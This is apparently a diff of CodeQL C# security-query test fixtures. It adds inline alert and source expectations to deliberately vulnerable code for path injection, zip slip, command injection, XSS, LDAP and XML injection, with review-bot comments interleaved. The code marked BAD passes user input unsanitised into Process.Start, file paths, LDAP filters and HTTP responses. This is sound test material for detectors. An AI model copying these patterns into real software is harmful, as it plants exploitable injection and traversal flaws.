@@ -1,6 +1,6 @@ - + - \ No newline at end of file + diff --git a/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetPagesValidateRequest/ASPNetPagesValidateRequest.qlref b/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetPagesValidateRequest/ASPNetPagesValidateRequest.qlref index f2d275efd563..5eaf78b95be4 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetPagesValidateRequest/ASPNetPagesValidateRequest.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetPagesValidateRequest/ASPNetPagesValidateRequest.qlref @@ -1 +1,2 @@ query: Security Features/CWE-016/ASPNetPagesValidateRequest.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetPagesValidateRequest/ASPNetPagesValidateRequestBad.config b/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetPagesValidateRequest/ASPNetPagesValidateRequestBad.config index e8fbc48cb6e8..927a73b39d00 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetPagesValidateRequest/ASPNetPagesValidateRequestBad.config +++ b/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetPagesValidateRequest/ASPNetPagesValidateRequestBad.config @@ -1,5 +1,5 @@ - + - \ No newline at end of file + diff --git a/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetRequestValidationMode/ASPNetRequestValidationMode.qlref b/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetRequestValidationMode/ASPNetRequestValidationMode.qlref index e38b59c5c75a..c057ae5aa6c8 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetRequestValidationMode/ASPNetRequestValidationMode.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetRequestValidationMode/ASPNetRequestValidationMode.qlref @@ -1 +1,2 @@ query: Security Features/CWE-016/ASPNetRequestValidationMode.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetRequestValidationMode/ASPNetRequestValidationModeBad.config b/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetRequestValidationMode/ASPNetRequestValidationModeBad.config index e2c8b8dc9031..2a9be99dc51e 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetRequestValidationMode/ASPNetRequestValidationModeBad.config +++ b/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetRequestValidationMode/ASPNetRequestValidationModeBad.config @@ -1,5 +1,5 @@ - + diff --git a/csharp/ql/test/query-tests/Security Features/CWE-020/UntrustedData.cs b/csharp/ql/test/query-tests/Security Features/CWE-020/UntrustedData.cs index 7b0f789c2aec..997ecc4f5cd2 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-020/UntrustedData.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-020/UntrustedData.cs @@ -6,11 +6,11 @@ public class UntrustedData : IHttpHandler { public void ProcessRequest(HttpContext ctx) { - var name = ctx.Request.QueryString["name"]; + var name = ctx.Request.QueryString["name"]; // $ Alert[cs/untrusted-data-to-external-api]=r1 $ Alert[cs/untrusted-data-to-external-api]=r1 $ Source[cs/untrusted-data-to-external-api]=r2 var len = name.Length; var myEncodedString = HttpUtility.HtmlEncode(name); - ctx.Response.Write(name); + ctx.Response.Write(name); // $ Alert[cs/untrusted-data-to-external-api]=r2 } public bool IsReusable => true; diff --git a/csharp/ql/test/query-tests/Security Features/CWE-020/UntrustedDataToExternalAPI.qlref b/csharp/ql/test/query-tests/Security Features/CWE-020/UntrustedDataToExternalAPI.qlref index 22d3fe2ef63c..65b603105088 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-020/UntrustedDataToExternalAPI.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-020/UntrustedDataToExternalAPI.qlref 
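Review bot: The expectation comment added to `var name = ctx.Request.QueryString["name"];` in ProcessRequest lists `Alert[cs/untrusted-data-to-external-api]=r1` twice, and the same repetition appears later in this patch on `return Request.RawUrl;` in XSS.cs (`=r11`) and on `CSharpScript.EvaluateAsync(box1.Text);` in CodeInjection.cs (`=r3`). If the line really yields two results, they should carry distinct labels so that losing one of them is visible in the test. If it yields one, the second tag is presumably generator residue and the comment can shrink to `// $ Alert[cs/untrusted-data-to-external-api]=r1 $ Source[cs/untrusted-data-to-external-api]=r2`. The diff alone does not show which case applies, so this is worth checking against the query output for these three lines.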
@@ -1,2 +1,4 @@ query: Security Features/CWE-020/UntrustedDataToExternalAPI.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-022/TaintedPath/TaintedPath.cs b/csharp/ql/test/query-tests/Security Features/CWE-022/TaintedPath/TaintedPath.cs index 3ea90facfd3c..a22efa5e25fa 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-022/TaintedPath/TaintedPath.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-022/TaintedPath/TaintedPath.cs @@ -7,14 +7,14 @@ public class TaintedPathHandler : IHttpHandler public void ProcessRequest(HttpContext ctx) { - String path = ctx.Request.QueryString["page"]; + String path = ctx.Request.QueryString["page"]; // $ Source[cs/path-injection]=r1 $ Source[cs/path-injection]=r2 $ Source[cs/path-injection]=r3 $ Source[cs/path-injection]=r4 $ Source[cs/path-injection]=r5 $ Source[cs/path-injection]=r6 $ Source[cs/path-injection]=r7 // BAD: Used via a File.Create... call. - using (StreamWriter sw = File.CreateText(path)) + using (StreamWriter sw = File.CreateText(path)) // $ Alert[cs/path-injection]=r1 { sw.WriteLine("Hello"); } // BAD: Used via StreamWriter constructor - using (StreamWriter sw = new StreamWriter(path)) + using (StreamWriter sw = new StreamWriter(path)) // $ Alert[cs/path-injection]=r2 { sw.WriteLine("Hello"); } 
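Review bot: The `String path = ctx.Request.QueryString["page"];` line in ProcessRequest now carries seven `Source[cs/path-injection]=rN` tags, so the annotation is several times longer than the statement it describes. TaintedPath.qlref names a single query, which makes the `[cs/path-injection]` qualifier and the per-sink labels look redundant. If the inline-expectations framework accepts unqualified tags for a single-query test, `// $ Source` on this line and `// $ Alert` on each sink would say the same thing. The same shape recurs on the source lines of CommandInjection.cs, LDAPInjection.cs and MissingXMLValidation.cs later in the patch. ProcessRequest continues past the end of this hunk.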
@@ -22,20 +22,20 @@ public void ProcessRequest(HttpContext ctx) // BAD: Check is insufficient, text is read. if (!path.StartsWith("../")) { - File.ReadAllText(path); + File.ReadAllText(path); // $ Alert[cs/path-injection]=r3 } // BAD: Check is insufficient, text is read. if (!string.IsNullOrEmpty(path)) { - File.ReadAllText(path); + File.ReadAllText(path); // $ Alert[cs/path-injection]=r4 } // BAD: Check is insufficient, text is read. string badPath = "/home/user/" + path; - if (File.Exists(badPath)) + if (File.Exists(badPath)) // $ Alert[cs/path-injection]=r5 { - ctx.Response.Write(File.ReadAllText(badPath)); + ctx.Response.Write(File.ReadAllText(badPath)); // $ Alert[cs/path-injection]=r6 } // GOOD: Tainted path is passed through MapPath @@ -48,7 +48,7 @@ public void ProcessRequest(HttpContext ctx) File.ReadAllText(path); } - Directory.Exists(path); + Directory.Exists(path); // $ Alert[cs/path-injection]=r7 // GOOD: A Guid. File.ReadAllText(new Guid(path).ToString()); diff --git a/csharp/ql/test/query-tests/Security Features/CWE-022/TaintedPath/TaintedPath.qlref b/csharp/ql/test/query-tests/Security Features/CWE-022/TaintedPath/TaintedPath.qlref index 10abc41286cf..9ab7666c8f1e 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-022/TaintedPath/TaintedPath.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-022/TaintedPath/TaintedPath.qlref @@ -1,3 +1,5 @@ query: Security Features/CWE-022/TaintedPath.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-022/ZipSlip/ZipSlip.cs b/csharp/ql/test/query-tests/Security Features/CWE-022/ZipSlip/ZipSlip.cs index 1ec93bba3edd..189fb1a6eb6e 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-022/ZipSlip/ZipSlip.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-022/ZipSlip/ZipSlip.cs 
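Review bot: `Directory.Exists(path);` in the last TaintedPath.cs hunk is now expected to alert (`=r7`), but unlike the other flagged calls in this file it has no `// BAD:` comment explaining why. Adding `// BAD: Tainted path is used in a directory existence check` above it would keep the test case self-describing, in line with the `// GOOD: A Guid.` comment that follows. The enclosing ProcessRequest starts and ends outside this hunk.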
@@ -12,15 +12,15 @@ public static void UnzipFileByFile(ZipArchive archive, { foreach (var entry in archive.Entries) { - string fullPath = Path.GetFullPath(entry.FullName); + string fullPath = Path.GetFullPath(entry.FullName); // $ Alert[cs/zipslip]=r1 $ Alert[cs/zipslip]=r2 $ Alert[cs/zipslip]=r3 string fileName = Path.GetFileName(entry.FullName); string filename = entry.Name; - string file = entry.FullName; + string file = entry.FullName; // $ Alert[cs/zipslip]=r4 if (!string.IsNullOrEmpty(file)) { // BAD string destFileName = Path.Combine(destDirectory, file); - entry.ExtractToFile(destFileName, true); + entry.ExtractToFile(destFileName, true); // $ Sink[cs/zipslip]=r4 // GOOD string sanitizedFileName = Path.Combine(destDirectory, fileName); @@ -28,15 +28,15 @@ public static void UnzipFileByFile(ZipArchive archive, // BAD string destFilePath = Path.Combine(destDirectory, fullPath); - entry.ExtractToFile(destFilePath, true); + entry.ExtractToFile(destFilePath, true); // $ Sink[cs/zipslip]=r1 // BAD: destFilePath isn't fully resolved, so may still contain .. if (destFilePath.StartsWith(destDirectory)) - entry.ExtractToFile(destFilePath, true); + entry.ExtractToFile(destFilePath, true); // $ Sink[cs/zipslip]=r2 // BAD destFilePath = Path.GetFullPath(Path.Combine(destDirectory, fullPath)); - entry.ExtractToFile(destFilePath, true); + entry.ExtractToFile(destFilePath, true); // $ Sink[cs/zipslip]=r3 // GOOD: a check for StartsWith against a fully resolved path if (destFilePath.StartsWith(destDirectory)) 
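Review bot: The flagged extractions for `=r1` and `=r3` in the second ZipSlip.cs hunk are introduced only by a bare `// BAD`, so a reader cannot tell how they differ from the GOOD case that follows. Suggested comments are `// BAD: entry path is combined with destDirectory without any containment check` for the first and `// BAD: path is fully resolved but never compared with destDirectory` for the third. The GOOD branch relies on `destFilePath.StartsWith(destDirectory)`, and whether destDirectory is normalised with a trailing separator is not visible here, so a comment stating that assumption would help anyone copying the pattern. UnzipFileByFile starts and ends outside the hunk.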
@@ -58,28 +58,28 @@ private static int UnzipToStream(Stream zipStream, string installDir) foreach (ZipArchiveEntry entry in archive.Entries) { // figure out where we are putting the file - String destFilePath = Path.Combine(InstallDir, entry.FullName); + String destFilePath = Path.Combine(InstallDir, entry.FullName); // $ Alert[cs/zipslip]=r5 $ Alert[cs/zipslip]=r6 $ Alert[cs/zipslip]=r7 $ Alert[cs/zipslip]=r8 Directory.CreateDirectory(Path.GetDirectoryName(destFilePath)); using (Stream archiveFileStream = entry.Open()) { // BAD: writing to file stream - using (Stream tfsFileStream = new FileStream(destFilePath, FileMode.CreateNew, FileAccess.ReadWrite, FileShare.None)) + using (Stream tfsFileStream = new FileStream(destFilePath, FileMode.CreateNew, FileAccess.ReadWrite, FileShare.None)) // $ Sink[cs/zipslip]=r5 { Console.WriteLine(@"Writing ""{0}""", destFilePath); archiveFileStream.CopyTo(tfsFileStream); } // BAD: can do it this way too - using (Stream tfsFileStream = File.Create(destFilePath)) + using (Stream tfsFileStream = File.Create(destFilePath)) // $ Sink[cs/zipslip]=r6 { Console.WriteLine(@"Writing ""{0}""", destFilePath); archiveFileStream.CopyTo(tfsFileStream); } // BAD: creating stream using fileInfo - var fileInfo = new FileInfo(destFilePath); + var fileInfo = new FileInfo(destFilePath); // $ Sink[cs/zipslip]=r7 using (FileStream fs = fileInfo.OpenWrite()) { Console.WriteLine(@"Writing ""{0}""", destFilePath); @@ -87,7 +87,7 @@ private static int UnzipToStream(Stream zipStream, string installDir) } // BAD: creating stream using fileInfo - var fileInfo1 = new FileInfo(destFilePath); + var fileInfo1 = new FileInfo(destFilePath); // $ Sink[cs/zipslip]=r8 using (FileStream fs = fileInfo1.Open(FileMode.Create)) { Console.WriteLine(@"Writing ""{0}""", destFilePath); 
diff --git a/csharp/ql/test/query-tests/Security Features/CWE-022/ZipSlip/ZipSlip.qlref b/csharp/ql/test/query-tests/Security Features/CWE-022/ZipSlip/ZipSlip.qlref index f8a7ab34e883..9d8f3ad5a64b 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-022/ZipSlip/ZipSlip.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-022/ZipSlip/ZipSlip.qlref @@ -1,2 +1,4 @@ query: Security Features/CWE-022/ZipSlip.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-022/ZipSlip/ZipSlipBad.cs b/csharp/ql/test/query-tests/Security Features/CWE-022/ZipSlip/ZipSlipBad.cs index fb6bce23b72f..5a996edbad86 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-022/ZipSlip/ZipSlipBad.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-022/ZipSlip/ZipSlipBad.cs @@ -6,7 +6,7 @@ class Bad public static void WriteToDirectory(ZipArchiveEntry entry, string destDirectory) { - string destFileName = Path.Combine(destDirectory, entry.FullName); - entry.ExtractToFile(destFileName); + string destFileName = Path.Combine(destDirectory, entry.FullName); // $ Alert[cs/zipslip]=r9 + entry.ExtractToFile(destFileName); // $ Sink[cs/zipslip]=r9 } } diff --git a/csharp/ql/test/query-tests/Security Features/CWE-078/CommandInjection.cs b/csharp/ql/test/query-tests/Security Features/CWE-078/CommandInjection.cs index df3db94b4335..36ece73221e3 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-078/CommandInjection.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-078/CommandInjection.cs 
@@ -24,16 +24,16 @@ class CommandInjection public void WebCommandInjection() { // BAD: Reading from textbox, then using that in the arguments and file name - string userInput = categoryTextBox.Text; - Process.Start("foo.exe" + userInput, "/c " + userInput); + string userInput = categoryTextBox.Text; // $ Source[cs/command-line-injection]=r1 $ Source[cs/command-line-injection]=r2 $ Source[cs/command-line-injection]=r3 $ Source[cs/command-line-injection]=r4 $ Source[cs/command-line-injection]=r5 $ Source[cs/command-line-injection]=r6 $ Source[cs/command-line-injection]=r7 + Process.Start("foo.exe" + userInput, "/c " + userInput); // $ Alert[cs/command-line-injection]=r1 $ Alert[cs/command-line-injection]=r2 - ProcessStartInfo startInfo = new ProcessStartInfo(userInput, userInput); + ProcessStartInfo startInfo = new ProcessStartInfo(userInput, userInput); // $ Alert[cs/command-line-injection]=r3 $ Alert[cs/command-line-injection]=r4 Process.Start(startInfo); ProcessStartInfo startInfoProps = new ProcessStartInfo(); - startInfoProps.FileName = userInput; - startInfoProps.Arguments = userInput; - startInfoProps.WorkingDirectory = userInput; + startInfoProps.FileName = userInput; // $ Alert[cs/command-line-injection]=r5 + startInfoProps.Arguments = userInput; // $ Alert[cs/command-line-injection]=r6 + startInfoProps.WorkingDirectory = userInput; // $ Alert[cs/command-line-injection]=r7 Process.Start(startInfoProps); } 
@@ -43,12 +43,12 @@ public void StoredCommandInjection() { connection.Open(); SqlCommand customerCommand = new SqlCommand("SELECT * FROM customers", connection); - SqlDataReader customerReader = customerCommand.ExecuteReader(); + SqlDataReader customerReader = customerCommand.ExecuteReader(); // $ Source[cs/command-line-injection]=r8 while (customerReader.Read()) { // BAD: Read from database, and use it to directly execute a command - Process.Start("foo.exe", "/c " + customerReader.GetString(1)); + Process.Start("foo.exe", "/c " + customerReader.GetString(1)); // $ Alert[cs/command-line-injection]=r8 } customerReader.Close(); } diff --git a/csharp/ql/test/query-tests/Security Features/CWE-078/CommandInjection.qlref b/csharp/ql/test/query-tests/Security Features/CWE-078/CommandInjection.qlref index 366f5105393f..607983370399 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-078/CommandInjection.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-078/CommandInjection.qlref @@ -1,2 +1,4 @@ query: Security Features/CWE-078/CommandInjection.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-079/StoredXSS/StoredXSS.cs b/csharp/ql/test/query-tests/Security Features/CWE-079/StoredXSS/StoredXSS.cs index 1096634b6903..1e30735d3265 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-079/StoredXSS/StoredXSS.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-079/StoredXSS/StoredXSS.cs 
@@ -14,12 +14,12 @@ public void processRequest(HttpContext context) { connection.Open(); SqlCommand customerCommand = new SqlCommand("SELECT * FROM customers", connection); - SqlDataReader customerReader = customerCommand.ExecuteReader(); + SqlDataReader customerReader = customerCommand.ExecuteReader(); // $ Source[cs/web/xss]=r1 while (customerReader.Read()) { // BAD: Read from database, write it straight to a response - context.Response.Write("Orders for " + customerReader.GetString(1)); + context.Response.Write("Orders for " + customerReader.GetString(1)); // $ Alert[cs/web/xss]=r1 } customerReader.Close(); } diff --git a/csharp/ql/test/query-tests/Security Features/CWE-079/StoredXSS/StoredXSS.qlref b/csharp/ql/test/query-tests/Security Features/CWE-079/StoredXSS/StoredXSS.qlref index 89b5b951bdb6..a71d47846701 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-079/StoredXSS/StoredXSS.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-079/StoredXSS/StoredXSS.qlref @@ -1,2 +1,4 @@ query: Security Features/CWE-079/XSS.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-079/XSSAsp/XSS.cs b/csharp/ql/test/query-tests/Security Features/CWE-079/XSSAsp/XSS.cs index eba40b891d58..6db6b4fc4b68 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-079/XSSAsp/XSS.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-079/XSSAsp/XSS.cs 
@@ -23,10 +23,10 @@ public void WebUIXSS() { // BAD: Reading from textbox, then writing an amended value to a control that does not HTML encode StringBuilder userInput = new StringBuilder(); - userInput.AppendFormat("{0} test", categoryTextBox.Text); - calendar.Caption = userInput.ToString(); - table.Caption = userInput.ToString(); - label.Text = userInput.ToString(); + userInput.AppendFormat("{0} test", categoryTextBox.Text); // $ Source[cs/web/xss]=r1 $ Source[cs/web/xss]=r2 $ Source[cs/web/xss]=r3 + calendar.Caption = userInput.ToString(); // $ Alert[cs/web/xss]=r1 + table.Caption = userInput.ToString(); // $ Alert[cs/web/xss]=r2 + label.Text = userInput.ToString(); // $ Alert[cs/web/xss]=r3 // GOOD: Reading from textbox, then writing an amended value to a control that does HTML encode categoryTextBox.Text = userInput.ToString(); @@ -35,8 +35,8 @@ public void WebUIXSS() public void processRequest(HttpContext context) { // BAD: Read user input from a request, write it straight to a response - string name = context.Request.QueryString["name"]; - context.Response.Write(name); + string name = context.Request.QueryString["name"]; // $ Source[cs/web/xss]=r4 + context.Response.Write(name); // $ Alert[cs/web/xss]=r4 // GOOD: Read user input from a request, but encode it before writing to the response string name2 = context.Request.QueryString["name"]; @@ -55,9 +55,9 @@ public void processNumber(HttpContext context) public void mvcProcess(HttpContext context) { // BAD: Mimic what happens in cshtml pages - string name = context.Request.Unvalidated.QueryString["name"]; + string name = context.Request.Unvalidated.QueryString["name"]; // $ Source[cs/web/xss]=r5 HtmlHelper html = new HtmlHelper(null, null); - html.Raw(name); + html.Raw(name); // $ Alert[cs/web/xss]=r5 } public void listener(HttpContext context) 
@@ -73,27 +73,27 @@ public void listener(HttpContext context) public void contextBase(HttpContextBase context) { // BAD: Writing user input directly to a HttpListenerResponse - string name = context.Request.QueryString["name"]; - context.Response.Write(name); + string name = context.Request.QueryString["name"]; // $ Source[cs/web/xss]=r6 + context.Response.Write(name); // $ Alert[cs/web/xss]=r6 // BAD: Writing user input directly to a HttpListenerResponse - string name2 = context.Request["name"]; - context.Response.Write(name2); + string name2 = context.Request["name"]; // $ Source[cs/web/xss]=r7 + context.Response.Write(name2); // $ Alert[cs/web/xss]=r7 } public void htmlStrings(HttpContextBase context) { // BAD: Writing user input into a HtmlString without encoding - string name = context.Request.QueryString["name"]; - new HtmlString(name); - new MvcHtmlString(name); + string name = context.Request.QueryString["name"]; // $ Source[cs/web/xss]=r8 $ Source[cs/web/xss]=r9 + new HtmlString(name); // $ Alert[cs/web/xss]=r8 + new MvcHtmlString(name); // $ Alert[cs/web/xss]=r9 new MyHtmlString(context.Request); } public void WebContent(HttpContextBase context) { // BAD: Writing user input into a StringContent without encoding - string name = context.Request.QueryString["name"]; - new StringContent(name); + string name = context.Request.QueryString["name"]; // $ Source[cs/web/xss]=r10 + new StringContent(name); // $ Alert[cs/web/xss]=r10 } public void HtmlEncoded(HttpContextBase context) @@ -137,7 +137,7 @@ public MyHtmlString(HttpRequestBase request) public string ToHtmlString() { - return Request.RawUrl; + return Request.RawUrl; // $ Alert[cs/web/xss]=r11 $ Alert[cs/web/xss]=r11 } } } diff --git a/csharp/ql/test/query-tests/Security Features/CWE-079/XSSAsp/XSS.qlref b/csharp/ql/test/query-tests/Security Features/CWE-079/XSSAsp/XSS.qlref index 89b5b951bdb6..a71d47846701 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-079/XSSAsp/XSS.qlref 
+++ b/csharp/ql/test/query-tests/Security Features/CWE-079/XSSAsp/XSS.qlref @@ -1,2 +1,4 @@ query: Security Features/CWE-079/XSS.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-079/XSSAsp/script.aspx b/csharp/ql/test/query-tests/Security Features/CWE-079/XSSAsp/script.aspx index 5dd4830d7567..7581e301c02f 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-079/XSSAsp/script.aspx +++ b/csharp/ql/test/query-tests/Security Features/CWE-079/XSSAsp/script.aspx @@ -9,13 +9,13 @@ diff --git a/csharp/ql/test/query-tests/Security Features/CWE-079/XSSRazorPages/XSS.qlref b/csharp/ql/test/query-tests/Security Features/CWE-079/XSSRazorPages/XSS.qlref index e0b85b8f4c6b..553ccc892d04 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-079/XSSRazorPages/XSS.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-079/XSSRazorPages/XSS.qlref @@ -1 +1,2 @@ query: Security Features/CWE-079/XSS.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-090/LDAPInjection.cs b/csharp/ql/test/query-tests/Security Features/CWE-090/LDAPInjection.cs index ddd24e19729f..725d5bbe93c0 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-090/LDAPInjection.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-090/LDAPInjection.cs 
@@ -9,36 +9,36 @@ public class LDAPInjectionHandler : IHttpHandler { public void ProcessRequest(HttpContext ctx) { - string userName = ctx.Request.QueryString["username"]; + string userName = ctx.Request.QueryString["username"]; // $ Source[cs/ldap-injection]=r1 $ Source[cs/ldap-injection]=r2 $ Source[cs/ldap-injection]=r3 $ Source[cs/ldap-injection]=r4 $ Source[cs/ldap-injection]=r5 $ Source[cs/ldap-injection]=r6 // BAD: Filter includes user input without encoding - DirectorySearcher ds = new DirectorySearcher("accountname=" + userName); + DirectorySearcher ds = new DirectorySearcher("accountname=" + userName); // $ Alert[cs/ldap-injection]=r1 DirectorySearcher ds2 = new DirectorySearcher(); - ds.Filter = "accountname=" + userName; + ds.Filter = "accountname=" + userName; // $ Alert[cs/ldap-injection]=r2 // GOOD: Filter includes user input with encoding DirectorySearcher ds3 = new DirectorySearcher("accountname=" + LDAPEncode(userName)); // BAD: SearchRequest Filter includes user input without encoding SearchRequest sr = new SearchRequest(); - sr.Filter = "accountname=" + userName; - SearchRequest sr2 = new SearchRequest(null, "accountname=" + userName, System.DirectoryServices.Protocols.SearchScope.Base, null); + sr.Filter = "accountname=" + userName; // $ Alert[cs/ldap-injection]=r3 + SearchRequest sr2 = new SearchRequest(null, "accountname=" + userName, System.DirectoryServices.Protocols.SearchScope.Base, null); // $ Alert[cs/ldap-injection]=r4 // BAD: Distinguished Name includes user input without encoding - DirectoryEntry de = new DirectoryEntry("LDAP://Cn=" + userName); + DirectoryEntry de = new DirectoryEntry("LDAP://Cn=" + userName); // $ Alert[cs/ldap-injection]=r5 DirectoryEntry de2 = new DirectoryEntry(); - de2.Path = "LDAP://Cn=" + userName; + de2.Path = "LDAP://Cn=" + userName; // $ Alert[cs/ldap-injection]=r6 using (SqlConnection connection = new SqlConnection("")) { connection.Open(); SqlCommand customerCommand = new SqlCommand("SELECT * FROM 
customers", connection); - SqlDataReader customerReader = customerCommand.ExecuteReader(); + SqlDataReader customerReader = customerCommand.ExecuteReader(); // $ Source[cs/ldap-injection]=r7 while (customerReader.Read()) { // BAD: Read from database, write it straight to a response - DirectorySearcher ds4 = new DirectorySearcher("accountname=" + customerReader.GetString(1)); + DirectorySearcher ds4 = new DirectorySearcher("accountname=" + customerReader.GetString(1)); // $ Alert[cs/ldap-injection]=r7 } customerReader.Close(); } diff --git a/csharp/ql/test/query-tests/Security Features/CWE-090/LDAPInjection.qlref b/csharp/ql/test/query-tests/Security Features/CWE-090/LDAPInjection.qlref index 06bd1eedc4f4..13eefd4645f9 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-090/LDAPInjection.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-090/LDAPInjection.qlref @@ -1,2 +1,4 @@ query: Security Features/CWE-090/LDAPInjection.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-091/XMLInjection/Test.cs b/csharp/ql/test/query-tests/Security Features/CWE-091/XMLInjection/Test.cs index f9dd6f3289e8..c394ed4b8cbb 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-091/XMLInjection/Test.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-091/XMLInjection/Test.cs 
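Review bot: In ProcessRequest the annotated line `ds.Filter = "accountname=" + userName;` assigns to `ds`, while the `ds2` constructed on the line before is never used in the visible lines. The test presumably meant `ds2.Filter = "accountname=" + userName; // $ Alert[cs/ldap-injection]=r2`, so that the property-setter sink is exercised on a searcher built without a filter. Separately, the comment above `ds4` says "write it straight to a response" although the value goes into an LDAP filter; `// BAD: Read from database, use it in an LDAP filter without encoding` matches the code. Both predate this commit, but fixing them while the expectations are being added keeps each label tied to the case it is meant to cover. The function body runs past the end of the hunk.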
@@ -5,14 +5,14 @@ public class XMLInjectionHandler : IHttpHandler { public void ProcessRequest(HttpContext ctx) { - string employeeName = ctx.Request.QueryString["employeeName"]; + string employeeName = ctx.Request.QueryString["employeeName"]; // $ Source[cs/xml-injection]=r1 using (XmlWriter writer = XmlWriter.Create("employees.xml")) { writer.WriteStartDocument(); // BAD: Insert user input directly into XML - writer.WriteRaw("" + employeeName + ""); + writer.WriteRaw("" + employeeName + ""); // $ Alert[cs/xml-injection]=r1 // GOOD: Escape user input before inserting into string writer.WriteRaw("" + SecurityElement.Escape(employeeName) + ""); diff --git a/csharp/ql/test/query-tests/Security Features/CWE-091/XMLInjection/XMLInjection.qlref b/csharp/ql/test/query-tests/Security Features/CWE-091/XMLInjection/XMLInjection.qlref index e39297fce167..96779d60ccb0 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-091/XMLInjection/XMLInjection.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-091/XMLInjection/XMLInjection.qlref @@ -1,2 +1,4 @@ query: Security Features/CWE-091/XMLInjection.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-094/CodeInjection.cs b/csharp/ql/test/query-tests/Security Features/CWE-094/CodeInjection.cs index e03bc9821f50..a557ebf4c724 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-094/CodeInjection.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-094/CodeInjection.cs 
